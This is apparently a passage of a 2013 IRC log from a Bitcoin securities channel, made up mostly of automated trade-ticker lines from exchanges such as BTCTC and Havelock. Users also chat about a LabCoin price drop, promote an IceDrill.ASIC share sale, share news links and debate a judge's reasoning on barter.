questions asked Aug 09 14:32:39 New Public shareholder protection clause added to IceDrill.ASIC for the benefit of public investors! https://bitcointalk.org/index.php?topic=269216.msg2897561#msg2897561 Aug 09 14:33:03 [HAVELOCK] [AM100] 1 @ 0.0339 BTC [-] Aug 09 14:33:45 [HAVELOCK] [AM100] 6 @ 0.03380001 = 0.2028 BTC [-] Aug 09 14:34:43 [HAVELOCK] [AM100] 5 @ 0.03380001 = 0.169 BTC [-] Aug 09 14:34:59 [BTCTC] [TAT.ASICMINER] 85 @ 0.03955 = 3.3618 BTC [-] Aug 09 14:35:14 [HAVELOCK] [AM100] 1 @ 0.0338 BTC [-] Aug 09 14:35:45 [HAVELOCK] [AM1] 1 @ 3.74999999 BTC [+] Aug 09 14:36:08 [BTCTC] [TAT.ASICMINER] 50 @ 0.03902 = 1.951 BTC [-] Aug 09 14:36:11 [BTCTC] [ASICMINER-PT] 1 @ 3.872 BTC [-] Aug 09 14:36:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.03901 = 1.9505 BTC [-] Aug 09 14:36:39 [BTCTC] [TAT.ASICMINER] 36 @ 0.039 = 1.404 BTC [-] Aug 09 14:36:42 [BTCTC] [COGNITIVE] 20 @ 0.42 = 8.4 BTC [-] Aug 09 14:37:14 [BTCTC] [COGNITIVE] 19 @ 0.445 = 8.455 BTC [+] Aug 09 14:43:00 [BTCTC] [BASIC-MINING] 1 @ 0.2772 BTC [+] Aug 09 14:43:01 [BTCTC] [BASIC-MINING] 3 @ 0.2772 = 0.8316 BTC [+] Aug 09 14:45:20 [BTCTC] [DMS.MINING] 6 @ 0.004576 = 0.0275 BTC [-] Aug 09 14:48:56 [BTCTC] [LABCOIN] 30 @ 0.001364 = 0.0409 BTC [+] Aug 09 14:50:47 [BTCTC] [LABCOIN] 30 @ 0.001362 = 0.0409 BTC [-] Aug 09 14:51:26 [BTCTC] [BASIC-MINING] 1 @ 0.2789 BTC [+] Aug 09 14:51:48 [BTCTC] [LABCOIN] 30 @ 0.001362 = 0.0409 BTC [-] Aug 09 14:52:18 [BTCTC] [COGNITIVE] 5 @ 0.4788 = 2.394 BTC [+] Aug 09 14:52:19 [BTCTC] [COGNITIVE] 4 @ 0.4789 = 1.9156 BTC [+] Aug 09 14:52:20 [BTCTC] [COGNITIVE] 1 @ 0.4789 BTC [+] Aug 09 14:54:37 [BTCTC] [BTC-TRADING-PT] 2 @ 0.7 = 1.4 BTC [+] Aug 09 14:54:46 [BTCTC] [BTCGARDEN] 2 @ 0.01599 = 0.032 BTC [+] Aug 09 14:55:21 [BTCTC] [LABCOIN] 30 @ 0.001358 = 0.0407 BTC [-] Aug 09 14:56:45 [BTCTC] [LABCOIN] 1 @ 0.001356 BTC [-] Aug 09 14:57:54 [BTCTC] [LABCOIN] 1 @ 0.001357 BTC [+] Aug 09 14:57:55 [BTCTC] [LABCOIN] 20 @ 0.001357 = 0.0271 BTC [+] Aug 09 14:58:06 [BTCTC] [LABCOIN] 30 @ 0.001355 = 0.0407 BTC [-] Aug 09 14:58:33 [BTCTC] [LABCOIN] 30 @ 0.001363 = 0.0409 BTC [+] Aug 09 14:58:43 [BTCTC] [LABCOIN] 2 @ 0.001364 = 0.0027 BTC [+] Aug 09 14:59:31 [BTCTC] [LABCOIN] 1 @ 0.001364 BTC [+] Aug 09 14:59:45 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 09 14:59:56 [BTCTC] [LABCOIN] 3 @ 0.001383 = 0.0041 BTC [+] Aug 09 15:00:03 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 09 15:00:20 [BTCTC] [LABCOIN] 1 @ 0.001384 BTC [+] Aug 09 15:00:23 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002412 = 0.0024 BTC [-] Aug 09 15:00:52 [BTCTC] [LABCOIN] 3 @ 0.001383 = 0.0041 BTC [-] Aug 09 15:01:24 [BTCTC] [LABCOIN] 30 @ 0.001385 = 0.0416 BTC [+] Aug 09 15:02:39 [BTCTC] [LABCOIN] 147 @ 0.001393 = 0.2048 BTC [+] Aug 09 15:02:40 [BTCTC] [LABCOIN] 9 @ 0.001394 = 0.0125 BTC [+] Aug 09 15:02:40 [BTCTC] [LABCOIN] 208 @ 0.001395 = 0.2902 BTC [+] Aug 09 15:03:48 [BTCTC] [S.MPOE-PT] 2 @ 0.0009401 = 0.0019 BTC [+] Aug 09 15:05:35 [BTCTC] [LABCOIN] 1 @ 0.001391 BTC [-] Aug 09 15:05:42 [BTCTC] [BTCGARDEN] 150 @ 0.01599 = 2.3985 BTC [+] Aug 09 15:06:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.03954 = 0.3559 BTC [+] Aug 09 15:06:50 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Aug 09 15:06:56 is sandstorm paying divs this week or nah? Aug 09 15:07:14 [BTCTC] [LABCOIN] 1 @ 0.00139 BTC [-] Aug 09 15:07:42 [HAVELOCK] [XBOND] 7 @ 0.00104688 = 0.0073 BTC [-] Aug 09 15:08:01 [BTCTC] [BITVPS] 1 @ 0.002099 BTC [+] Aug 09 15:09:00 [BTCTC] [LABCOIN] 6 @ 0.001388 = 0.0083 BTC [-] Aug 09 15:09:03 [BTCTC] [LABCOIN] 67 @ 0.001388 = 0.093 BTC [-] Aug 09 15:09:04 [BTCTC] [RSM] 1 @ 0.0123 BTC [+] Aug 09 15:09:45 [BTCTC] [ACTIVEMINING] 2 @ 0.005672 = 0.0113 BTC [-] Aug 09 15:09:46 [BTCTC] [ACTIVEMINING] 11 @ 0.005673 = 0.0624 BTC [+] Aug 09 15:09:47 [BTCTC] [ACTIVEMINING] 288 @ 0.005694 = 1.6399 BTC [+] Aug 09 15:09:48 [BTCTC] [ACTIVEMINING] 223 @ 0.005695 = 1.27 BTC [+] Aug 09 15:11:29 [BTCTC] [CB.IDIFF-O] 1 @ 0.0095 BTC [+] Aug 09 15:12:39 [BTCTC] [LTC-ATF.B2] 1 @ 0.01044 BTC [+] Aug 09 15:12:51 [BTCTC] [LABCOIN] 126 @ 0.001385 = 0.1745 BTC [-] Aug 09 15:12:52 [BTCTC] [LABCOIN] 50 @ 0.001386 = 0.0693 BTC [+] Aug 09 15:12:53 [BTCTC] [LABCOIN] 965 @ 0.001387 = 1.3385 BTC [+] Aug 09 15:12:54 [BTCTC] [LABCOIN] 2 @ 0.001391 = 0.0028 BTC [+] Aug 09 15:12:56 [BTCTC] [LABCOIN] 20 @ 0.001392 = 0.0278 BTC [+] Aug 09 15:12:56 [BTCTC] [LABCOIN] 131 @ 0.001398 = 0.1831 BTC [+] Aug 09 15:12:57 [BTCTC] [LABCOIN] 50 @ 0.001399 = 0.07 BTC [+] Aug 09 15:12:58 [BTCTC] [LABCOIN] 716 @ 0.0014 = 1.0024 BTC [+] Aug 09 15:13:45 [BTCTC] [B.YABMC] 1 @ 0.002399 BTC [+] Aug 09 15:14:57 [BTCTC] [DMS.MINING] 1 @ 0.0048 BTC [+] Aug 09 15:15:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002297 BTC [+] Aug 09 15:15:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002298 BTC [+] Aug 09 15:15:42 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.002299 = 0.0851 BTC [+] Aug 09 15:15:43 [BTCTC] [TAT.VIRTUALMINE] 847 @ 0.00238 = 2.0159 BTC [+] Aug 09 15:15:44 [BTCTC] [TAT.VIRTUALMINE] 114 @ 0.002385 = 0.2719 BTC [+] Aug 09 15:15:45 [BTCTC] [TAT.VIRTUALMINE] 800 @ 0.00239 = 1.912 BTC [+] Aug 09 15:15:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.03954 = 0.6326 BTC [+] Aug 09 15:15:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.03954 = 0.3163 BTC [+] Aug 09 15:16:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00239 BTC [+] Aug 09 15:17:06 [BTCTC] [TAT.VIRTUALMINE] 74 @ 0.00239 = 0.1769 BTC [+] Aug 09 15:17:56 [BTCTC] [KENILWORTH] 10 @ 0.00175 = 0.0175 BTC [-] Aug 09 15:20:45 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Aug 09 15:20:56 [BTCTC] [COGNITIVE] 2 @ 0.3834 = 0.7668 BTC [-] Aug 09 15:22:23 [BTCTC] [BFMINES] 1 @ 0.003 BTC [-] Aug 09 15:23:50 [BTCTC] [BTCGARDEN] 51 @ 0.0156 = 0.7956 BTC [-] Aug 09 15:24:18 [BTCTC] [ASICMINER-PT] 2 @ 3.85 = 7.7 BTC [+] Aug 09 15:24:47 [BTCTC] [S.MPOE-PT] 1 @ 0.0009401 BTC [+] Aug 09 15:25:10 [BTCTC] [ASICMINER-PT] 10 @ 3.953 = 39.53 BTC [+] Aug 09 15:25:35 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002412 BTC [-] Aug 09 15:27:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03954 BTC [+] Aug 09 15:27:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.03954 = 0.5931 BTC [+] Aug 09 15:27:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.03954 = 1.977 BTC [+] Aug 09 15:27:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.0396 = 0.3168 BTC [+] Aug 09 15:28:26 [BTCTC] [TAT.ASICMINER] 23 @ 0.03965 = 0.912 BTC [+] Aug 09 15:30:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.0387 = 0.2709 BTC [-] Aug 09 15:30:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.03801 = 0.2281 BTC [-] Aug 09 15:30:58 [BTCTC] [TAT.ASICMINER] 30 @ 0.038 = 1.14 BTC [-] Aug 09 15:30:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.03751 = 0.3751 BTC [-] Aug 09 15:31:00 [BTCTC] [TAT.ASICMINER] 53 @ 0.0375 = 1.9875 BTC [-] Aug 09 15:31:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.03707 = 0.2966 BTC [-] Aug 09 15:31:03 [BTCTC] [TAT.ASICMINER] 40 @ 0.03706 = 1.4824 BTC [-] Aug 09 15:31:04 [BTCTC] [TAT.ASICMINER] 12 @ 0.03651 = 0.4381 BTC [-] Aug 09 15:31:04 [BTCTC] [TAT.ASICMINER] 34 @ 0.0365 = 1.241 BTC [-] Aug 09 15:31:14 [HAVELOCK] [AM100] 17 @ 0.035 = 0.595 BTC [+] Aug 09 15:31:16 [HAVELOCK] [AM100] 183 @ 0.036 = 6.588 BTC [+] Aug 09 15:35:06 [BTCTC] [DMS.SELLING] 5 @ 0.02363 = 0.1182 BTC [-] Aug 09 15:36:22 There's whiskey, 2 horn, good stuff. Aug 09 15:36:30 there's this* Aug 09 15:36:34 blah too good Aug 09 15:42:52 [BTCTC] [BTCGARDEN] 200 @ 0.0156 = 3.12 BTC [-] Aug 09 15:43:45 [BTCTC] [BTCGARDEN] 249 @ 0.0156 = 3.8844 BTC [-] Aug 09 15:45:12 [HAVELOCK] [SDSTM] 1 @ 0.00560201 BTC [-] Aug 09 15:45:49 [HAVELOCK] [SDSTM] 6 @ 0.005602 = 0.0336 BTC [-] Aug 09 15:47:34 [BTCTC] [KENILWORTH] 10 @ 0.00172 = 0.0172 BTC [-] Aug 09 15:47:36 [BTCTC] [DMS.SELLING] 3 @ 0.0241 = 0.0723 BTC [+] Aug 09 15:47:38 [BTCTC] [DMS.SELLING] 3 @ 0.02419 = 0.0726 BTC [+] Aug 09 15:47:39 [BTCTC] [DMS.SELLING] 28 @ 0.02419 = 0.6773 BTC [+] Aug 09 15:47:59 [BTCTC] [ACTIVEMINING] 32 @ 0.005694 = 0.1822 BTC [-] Aug 09 15:49:09 [BTCTC] [DMS.PURCHASE] 28 @ 0.02822 = 0.7902 BTC [-] Aug 09 15:51:02 [BTCTC] [LABCOIN] 30 @ 0.001354 = 0.0406 BTC [-] Aug 09 15:51:38 [HAVELOCK] [LABCO] 442 @ 0.00117 = 0.5171 BTC [-] Aug 09 15:52:15 [HAVELOCK] [AM100] 13 @ 0.036 = 0.468 BTC [+] Aug 09 15:52:38 [BTCTC] [LABCOIN] 20 @ 0.001353 = 0.0271 BTC [-] Aug 09 15:53:06 [BTCTC] [BFMINES] 99 @ 0.002511 = 0.2486 BTC [-] Aug 09 15:53:17 [BTCTC] [BFMINES] 3 @ 0.00251 = 0.0075 BTC [-] Aug 09 15:53:22 [HAVELOCK] [AM100] 1 @ 0.0368999 BTC [+] Aug 09 15:54:05 [HAVELOCK] [XBOND] 10 @ 0.00104688 = 0.0105 BTC [-] Aug 09 15:54:24 [BTCTC] [DMS.PURCHASE] 3 @ 0.02822 = 0.0847 BTC [-] Aug 09 15:54:39 http://i.imgur.com/e7v5acM.jpg Aug 09 15:57:33 [BTCTC] [BFMINES] 1 @ 0.002511 BTC [+] Aug 09 15:58:09 [BTCTC] [DMS.MINING] 25 @ 0.00458 = 0.1145 BTC [-] Aug 09 15:58:10 [BTCTC] [DMS.MINING] 3 @ 0.004576 = 0.0137 BTC [-] Aug 09 16:00:22 [BTCTC] [LABCOIN] 30 @ 0.001331 = 0.0399 BTC [-] Aug 09 16:00:45 [HAVELOCK] [SDSTM] [PAID] 1.59800000 BTC to 100`000 shares, 1598 satoshi per share Aug 09 16:00:54 [BTCTC] [LABCOIN] 30 @ 0.00133 = 0.0399 BTC [-] Aug 09 16:01:21 [BTCTC] [BASIC-MINING] 1 @ 0.277 BTC [-] Aug 09 16:01:44 [BTCTC] [BASIC-MINING] 1 @ 0.2769 BTC [-] Aug 09 16:02:26 [BTCTC] [ASICMINER-PT] 1 @ 3.731 BTC [-] Aug 09 16:02:43 [BTCTC] [LABCOIN] 30 @ 0.001311 = 0.0393 BTC [-] Aug 09 16:02:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.03958 = 0.1583 BTC [+] Aug 09 16:03:37 [BTCTC] [LABCOIN] 30 @ 0.001311 = 0.0393 BTC [-] Aug 09 16:03:48 [BTCTC] [LABCOIN] 30 @ 0.001327 = 0.0398 BTC [+] Aug 09 16:03:49 [BTCTC] [LABCOIN] 3 @ 0.001328 = 0.004 BTC [+] Aug 09 16:03:50 [BTCTC] [LABCOIN] 17 @ 0.001399 = 0.0238 BTC [+] Aug 09 16:03:51 [BTCTC] [LABCOIN] 220 @ 0.0014 = 0.308 BTC [+] Aug 09 16:04:15 [BTCTC] [LABCOIN] 1 @ 0.001327 BTC [-] Aug 09 16:04:17 [BTCTC] [LABCOIN] 1711 @ 0.001312 = 2.2448 BTC [-] Aug 09 16:04:18 [BTCTC] [LABCOIN] 235 @ 0.001312 = 0.3083 BTC [-] Aug 09 16:04:18 [BTCTC] [LABCOIN] 30 @ 0.001311 = 0.0393 BTC [-] Aug 09 16:04:20 [BTCTC] [LABCOIN] 6 @ 0.00131 = 0.0079 BTC [-] Aug 09 16:04:21 [BTCTC] [LABCOIN] 1 @ 0.001306 BTC [-] Aug 09 16:04:22 [BTCTC] [LABCOIN] 6730 @ 0.001305 = 8.7827 BTC [-] Aug 09 16:04:23 [BTCTC] [LABCOIN] 63 @ 0.0013 = 0.0819 BTC [-] Aug 09 16:05:01 [BTCTC] [LABCOIN] 235 @ 0.001304 = 0.3064 BTC [+] Aug 09 16:05:03 [BTCTC] [LABCOIN] 30 @ 0.001303 = 0.0391 BTC [-] Aug 09 16:05:04 [BTCTC] [LABCOIN] 123 @ 0.001302 = 0.1601 BTC [-] Aug 09 16:05:05 [BTCTC] [LABCOIN] 1937 @ 0.0013 = 2.5181 BTC [-] Aug 09 16:05:06 [BTCTC] [LABCOIN] 10 @ 0.0013 = 0.013 BTC [-] Aug 09 16:05:07 [BTCTC] [LABCOIN] 1 @ 0.001295 BTC [-] Aug 09 16:05:23 [BTCTC] [LABCOIN] 2 @ 0.00128 = 0.0026 BTC [-] Aug 09 16:05:25 [BTCTC] [LABCOIN] 7 @ 0.001277 = 0.0089 BTC [-] Aug 09 16:05:26 [BTCTC] [LABCOIN] 60 @ 0.001276 = 0.0766 BTC [-] Aug 09 16:05:27 [BTCTC] [LABCOIN] 37 @ 0.001274 = 0.0471 BTC [-] Aug 09 16:05:29 [BTCTC] [LABCOIN] 300 @ 0.001273 = 0.3819 BTC [-] Aug 09 16:05:30 [BTCTC] [LABCOIN] 282 @ 0.001272 = 0.3587 BTC [-] Aug 09 16:05:31 [BTCTC] [LABCOIN] 2888 @ 0.001271 = 3.6706 BTC [-] Aug 09 16:05:32 [BTCTC] [LABCOIN] 191 @ 0.001271 = 0.2428 BTC [-] Aug 09 16:05:36 <[1]lewicki> ruh roh Aug 09 16:06:05 same ol morning dump and pump Aug 09 16:06:27 Should of sold, but I'm still drunk atm :\ Aug 09 16:06:55 <[1]lewicki> https://bitcointalk.org/index.php?topic=263445.msg2897058#msg2897058 Aug 09 16:06:59 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Aug 09 16:07:14 [BTCTC] [BITVPS] 81 @ 0.001911 = 0.1548 BTC [-] Aug 09 16:07:15 [BTCTC] [BITVPS] 30 @ 0.00191 = 0.0573 BTC [-] Aug 09 16:07:16 [BTCTC] [BITVPS] 90 @ 0.001908 = 0.1717 BTC [-] Aug 09 16:07:17 [BTCTC] [BITVPS] 40 @ 0.0019 = 0.076 BTC [-] Aug 09 16:07:18 [BTCTC] [BITVPS] 50 @ 0.001865 = 0.0933 BTC [-] Aug 09 16:07:19 [BTCTC] [BITVPS] 50 @ 0.001864 = 0.0932 BTC [-] Aug 09 16:07:20 [BTCTC] [BITVPS] 100 @ 0.00186 = 0.186 BTC [-] Aug 09 16:07:22 [BTCTC] [BITVPS] 100 @ 0.001811 = 0.1811 BTC [-] Aug 09 16:07:23 [BTCTC] [BITVPS] 251 @ 0.001808 = 0.4538 BTC [-] Aug 09 16:07:47 [BTCTC] [BITVPS] 49 @ 0.001808 = 0.0886 BTC [-] Aug 09 16:08:30 [BTCTC] [BITVPS] 1721 @ 0.001802 = 3.1012 BTC [-] Aug 09 16:08:40 [BTCTC] [BFMINES] 1 @ 0.002501 BTC [-] Aug 09 16:08:51 [BTCTC] [DMS.SELLING] 18 @ 0.02364 = 0.4255 BTC [-] Aug 09 16:09:27 you know Aug 09 16:09:32 [BTCTC] [BFMINES] 3 @ 0.002501 = 0.0075 BTC [-] Aug 09 16:09:34 [BTCTC] [BFMINES] 50 @ 0.0025 = 0.125 BTC [-] Aug 09 16:09:35 [BTCTC] [BFMINES] 256 @ 0.0025 = 0.64 BTC [-] Aug 09 16:09:36 the one person that should of been at the q&a Aug 09 16:09:37 Any more [announcements]^2 from Yifu? Aug 09 16:09:39 and he wasn't lol Aug 09 16:09:44 <[1]lewicki> yeah :/ Aug 09 16:09:48 <[1]lewicki> i would have paid Aug 09 16:09:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.03957 = 0.1187 BTC [-] Aug 09 16:10:14 <[1]lewicki> here's an activemining share, have a seat Aug 09 16:10:56 [HAVELOCK] [XBOND] 7 @ 0.00104688 = 0.0073 BTC [-] Aug 09 16:11:43 [MPEX] [S.MPOE] 3664 @ 0.00083483 = 3.0588 BTC [+] Aug 09 16:11:49 [BTCTC] [BTCGARDEN] 4 @ 0.01598 = 0.0639 BTC [+] Aug 09 16:12:01 [BTCTC] [LABCOIN] 1 @ 0.001288 BTC [+] Aug 09 16:12:02 [BTCTC] [LABCOIN] 2 @ 0.001291 = 0.0026 BTC [+] Aug 09 16:12:03 [BTCTC] [LABCOIN] 20 @ 0.001292 = 0.0258 BTC [+] Aug 09 16:12:40 [HAVELOCK] [AM100] 50 @ 0.0368999 = 1.845 BTC [+] Aug 09 16:12:55 [HAVELOCK] [XBOND] 150 @ 0.00104688 = 0.157 BTC [-] Aug 09 16:16:20 [BTCTC] [ASICMINER-PT] 1 @ 3.926 BTC [+] Aug 09 16:16:22 [BTCTC] [ASICMINER-PT] 3 @ 3.927 = 11.781 BTC [+] Aug 09 16:16:23 [BTCTC] [ASICMINER-PT] 1 @ 3.93 BTC [+] Aug 09 16:21:19 damn labcoin is almost back to IPO Aug 09 16:22:13 you expected otherwise? Aug 09 16:22:40 honestly no I didnt, thats why I never bought any shares Aug 09 16:22:41 here's another hint for you, it will drop below IPO too Aug 09 16:22:46 This is the daily dump, idk what to expect out of any ipo/stock at this moment lol Aug 09 16:24:57 [BTCTC] [DMS.PURCHASE] 1 @ 0.02822 BTC [-] Aug 09 16:25:08 [BTCTC] [CB.IDIFF-O] 1 @ 0.0095 BTC [+] Aug 09 16:26:50 [BTCTC] [TAT.ASICMINER] 42 @ 0.03937 = 1.6535 BTC [-] Aug 09 16:26:57 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [-] Aug 09 16:27:23 <[1]lewicki> What was the first hint? Aug 09 16:29:36 [MPEX] [S.MPOE] 6836 @ 0.00083483 = 5.7069 BTC [+] Aug 09 16:29:38 [MPEX] [S.MPOE] 11864 @ 0.00083417 = 9.8966 BTC [-] Aug 09 16:29:49 I guess the LabCoin shareholders read this: https://bitcointalk.org/index.php?topic=263445.msg2898248#msg2898248 Aug 09 16:30:27 [BTCTC] [LABCOIN] 8 @ 0.001323 = 0.0106 BTC [+] Aug 09 16:30:42 [HAVELOCK] [AM1] 1 @ 3.74999999 BTC [+] Aug 09 16:30:47 [HAVELOCK] [AM1] 1 @ 3.75 BTC [+] Aug 09 16:30:50 [HAVELOCK] [AM1] 1 @ 3.78 BTC [+] Aug 09 16:31:07 Nope Aug 09 16:31:16 http://bcoinnews.com/ Aug 09 16:31:20 Bitcoin news Aug 09 16:33:02 [BTCTC] [LABCOIN] 8 @ 0.001315 = 0.0105 BTC [-] Aug 09 16:35:46 [BTCTC] [BASIC-MINING] 1 @ 0.2762 BTC [-] Aug 09 16:38:10 [BTCTC] [BASIC-MINING] 2 @ 0.2762 = 0.5524 BTC [-] Aug 09 16:39:52 Only 6 million shares left of the IceDrill.ASIC initial batch! https://bitcointalk.org/index.php?topic=269216.msg2898310#msg2898310 purchase you share for 0.0014 BTC! Aug 09 16:41:24 [HAVELOCK] [LABCO] 58 @ 0.00117 = 0.0679 BTC [-] Aug 09 16:41:26 [HAVELOCK] [LABCO] 652 @ 0.001161 = 0.757 BTC [-] Aug 09 16:41:50 [BTCTC] [DMS.PURCHASE] 300 @ 0.02822 = 8.466 BTC [-] Aug 09 16:43:22 [BTCTC] [BTCGARDEN] 28 @ 0.01562 = 0.4374 BTC [-] Aug 09 16:43:52 [BTCTC] [ACTIVEMINING] 30 @ 0.005524 = 0.1657 BTC [-] Aug 09 16:43:54 [BTCTC] [ACTIVEMINING] 68 @ 0.005523 = 0.3756 BTC [-] Aug 09 16:43:55 [BTCTC] [ACTIVEMINING] 9 @ 0.005519 = 0.0497 BTC [-] Aug 09 16:43:56 [BTCTC] [ACTIVEMINING] 68 @ 0.005514 = 0.375 BTC [-] Aug 09 16:44:06 [BTCTC] [LABCOIN] 30 @ 0.001302 = 0.0391 BTC [-] Aug 09 16:44:07 [BTCTC] [LABCOIN] 3 @ 0.001301 = 0.0039 BTC [-] Aug 09 16:45:33 [BTCTC] [DMS.MINING] 3 @ 0.004797 = 0.0144 BTC [+] Aug 09 16:46:08 http://news.cnet.com/8301-13578_3-57597726-38/silent-circle-follows-lavabit-in-shuttering-encrypted-e-mail/ Aug 09 16:46:15 Silent Circle follows Lavabit in shuttering encrypted e-mail | Politics and Law - CNET News Aug 09 16:46:38 [BTCTC] [ACTIVEMINING] 1 @ 0.0055 BTC [-] Aug 09 16:46:40 [BTCTC] [ACTIVEMINING] 249 @ 0.0055 = 1.3695 BTC [-] Aug 09 16:46:44 [BTCTC] [BASIC-MINING] 1 @ 0.2777 BTC [+] Aug 09 16:47:01 [BTCTC] [DMS.MINING] 20 @ 0.00458 = 0.0916 BTC [-] Aug 09 16:47:03 [BTCTC] [DMS.MINING] 132 @ 0.004576 = 0.604 BTC [-] Aug 09 16:47:04 [BTCTC] [DMS.MINING] 152 @ 0.004575 = 0.6954 BTC [-] Aug 09 16:47:41 [BTCTC] [TAT.ASICMINER] 11 @ 0.03823 = 0.4205 BTC [-] Aug 09 16:50:26 [BTCTC] [LABCOIN] 120 @ 0.001299 = 0.1559 BTC [-] Aug 09 16:52:28 [BTCTC] [LABCOIN] 120 @ 0.001299 = 0.1559 BTC [-] Aug 09 16:53:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.03909 = 0.0782 BTC [+] Aug 09 16:54:38 [BTCTC] [LABCOIN] 90 @ 0.001299 = 0.1169 BTC [-] Aug 09 16:55:46 [BTCTC] [DMS.MINING] 100 @ 0.004798 = 0.4798 BTC [+] Aug 09 16:57:08 [BTCTC] [BTCGARDEN] 32 @ 0.01562 = 0.4998 BTC [-] Aug 09 16:57:23 [BTCTC] [TAT.VIRTUALMINE] 976 @ 0.002043 = 1.994 BTC [-] Aug 09 16:57:24 [BTCTC] [TAT.VIRTUALMINE] 132 @ 0.002042 = 0.2695 BTC [-] Aug 09 16:57:26 [BTCTC] [TAT.VIRTUALMINE] 72 @ 0.002041 = 0.147 BTC [-] Aug 09 16:57:35 [BTCTC] [BTCGARDEN] 80 @ 0.01562 = 1.2496 BTC [-] Aug 09 16:58:13 [BTCTC] [TAT.VIRTUALMINE] 128 @ 0.002042 = 0.2614 BTC [+] Aug 09 16:58:42 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002043 = 0.2043 BTC [+] Aug 09 16:58:44 [BTCTC] [TAT.VIRTUALMINE] 849 @ 0.002042 = 1.7337 BTC [-] Aug 09 16:58:46 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00201 = 0.201 BTC [-] Aug 09 16:59:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.03908 = 1.3678 BTC [-] Aug 09 16:59:49 [BTCTC] [ACTIVEMINING] 51 @ 0.0055 = 0.2805 BTC [-] Aug 09 17:00:23 [HAVELOCK] [AM100] 1 @ 0.0344 BTC [-] Aug 09 17:01:03 [BTCTC] [BTCGARDEN] 28 @ 0.01562 = 0.4374 BTC [-] Aug 09 17:01:04 [BTCTC] [BTCGARDEN] 450 @ 0.01562 = 7.029 BTC [-] Aug 09 17:01:05 [BTCTC] [BTCGARDEN] 430 @ 0.01561 = 6.7123 BTC [-] Aug 09 17:02:29 [HAVELOCK] [AM100] 1 @ 0.0344 BTC [-] Aug 09 17:02:59 [HAVELOCK] [AM100] 7 @ 0.0344 = 0.2408 BTC [-] Aug 09 17:03:02 [HAVELOCK] [AM100] 1 @ 0.0368 BTC [+] Aug 09 17:03:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.03908 = 0.2736 BTC [-] Aug 09 17:04:52 [BTCTC] [NASTY-PT] 25 @ 0.004167 = 0.1042 BTC [+] Aug 09 17:09:46 [BTCTC] [BITVPS] 29 @ 0.002039 = 0.0591 BTC [+] Aug 09 17:15:21 http://trilema.com/2013/simple-yet-effective-way-to-troll-white-rich-american-people/ Aug 09 17:15:24 Simple yet effective way to troll white rich American people pe Trilema - Un blog de Mircea Popescu. Aug 09 17:15:42 if i were living in united retardica i'd be getting rid of my monopoly board right about now. Aug 09 17:15:48 it's not worth the legal implications. Aug 09 17:18:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03896 BTC [-] Aug 09 17:18:48 [HAVELOCK] [XBOND] 55 @ 0.00104687 = 0.0576 BTC [-] Aug 09 17:19:38 [MPEX] [S.MPOE] 12562 @ 0.00083555 = 10.4962 BTC [+] Aug 09 17:19:42 [HAVELOCK] [XBOND] 2 @ 0.00104688 = 0.0021 BTC [+] Aug 09 17:20:05 mp i appreciate the sentiment, do you have a simple legal perspective to show why that judge's leap is flawed? Aug 09 17:20:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03896 = 0.0779 BTC [-] Aug 09 17:20:12 [BTCTC] [TAT.ASICMINER] 26 @ 0.03897 = 1.0132 BTC [+] Aug 09 17:20:45 you explain that it is so, and give examples of why it shouldn't be allowed, but you don't actually say why Aug 09 17:20:54 if you know what i mean Aug 09 17:21:45 his statement is "x could be used as y therefore x is y"./ Aug 09 17:21:52 this is logically unsound. i don't need to do more than say that. Aug 09 17:22:05 it also has the unfortunate implication that if used it may turn anything into anything else Aug 09 17:22:18 but this is not news : all logical errors give the errant this magical ability. Aug 09 17:22:20 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [+] Aug 09 17:22:47 i agree it is not sound logic Aug 09 17:22:54 well that's all there is to it. Aug 09 17:22:58 but this does not make him wrong specifically Aug 09 17:23:01 yes, it does. Aug 09 17:23:10 nothing a judge says may ever be unsound logically. Aug 09 17:23:23 that's in one line the whole profession. Aug 09 17:23:25 couldnt he have arrived at the correct result? Aug 09 17:23:29 nope./ Aug 09 17:23:34 fruits of the poisonous tree. Aug 09 17:23:40 not even by mistake? Aug 09 17:24:01 [BTCTC] [LABCOIN] 84 @ 0.001296 = 0.1089 BTC [-] Aug 09 17:24:05 like in the US, they pretty much want to tax all barter too, no? Aug 09 17:25:08 what they want to do is irrelevant however. Aug 09 17:25:09 [BTCTC] [BTCGARDEN] 28 @ 0.01596 = 0.4469 BTC [+] Aug 09 17:25:11 [BTCTC] [BTCGARDEN] 1000 @ 0.01597 = 15.97 BTC [+] Aug 09 17:25:13 [BTCTC] [BTCGARDEN] 748 @ 0.01599 = 11.9605 BTC [+] Aug 09 17:25:14 [BTCTC] [BTCGARDEN] 779 @ 0.016 = 12.464 BTC [+] Aug 09 17:25:14 [BTCTC] [BTCGARDEN] 317 @ 0.016 = 5.072 BTC [+] Aug 09 17:25:16 